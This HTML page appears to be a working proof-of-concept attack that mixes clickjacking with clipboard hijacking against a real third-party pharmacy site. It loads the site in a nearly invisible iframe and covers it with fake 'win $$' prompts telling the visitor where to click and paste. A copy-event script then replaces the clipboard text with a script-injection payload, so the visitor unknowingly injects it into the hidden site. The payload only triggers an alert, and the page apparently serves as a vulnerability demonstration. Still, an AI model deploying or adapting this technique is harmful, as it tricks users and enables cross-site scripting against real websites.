<html>
    <head>
    </head>
    <body>
        <style>
            label {
            position: absolute;
            top: 50px; 
            left: 50px; 
            font-size: 18px;
            z-index: 3; 
        }

        .label-effect {
            display: inline-block;
            position: absolute;
            top: 177px; 
            left: 60px; 
            padding: 18px 80px;
            width: 500px;
            border: 2px solid #000;
            border-radius: 5px;
            color: #000;
            z-index: -3;
        }
    </style>
        <label style="position: fixed;margin-top: 10px;z-index: 8;font-size: 30px;">second copy these: WIN100000$</label>
        </br>
        <p style="margin-left: 750px;margin-top: 140px;position: fixed;font-size: 30px;"> <====== finaly paste here to win $$</p>
        </br>
        </br>
        <iframe z- style="width:800px; height:100%;z-index: 4;opacity: 0.01;" frameBorder="0" src="https://spsah2.securevetsource.com/site/view/OnlinePharmacy.pml"></iframe>
        <script>
            document.addEventListener('copy', function(e){
                console.log(e);
                e.clipboardData.setData('text/plain', '\x3cscript\x3ealert("Abdelrhman_xx")\x3c/script\x3e');
                e.preventDefault();
            });
        </script>
        <div class="label-effect"></div>
        <div style="position: absolute;top: 500px; left: 240px; font-size: 18px;z-index: 3;"> <===== First click here</div>
        <div style="position: absolute;top: 500px; left: 150px; font-size: 18px;z-index: -4;">Request</div>
        
    </body>
</html>
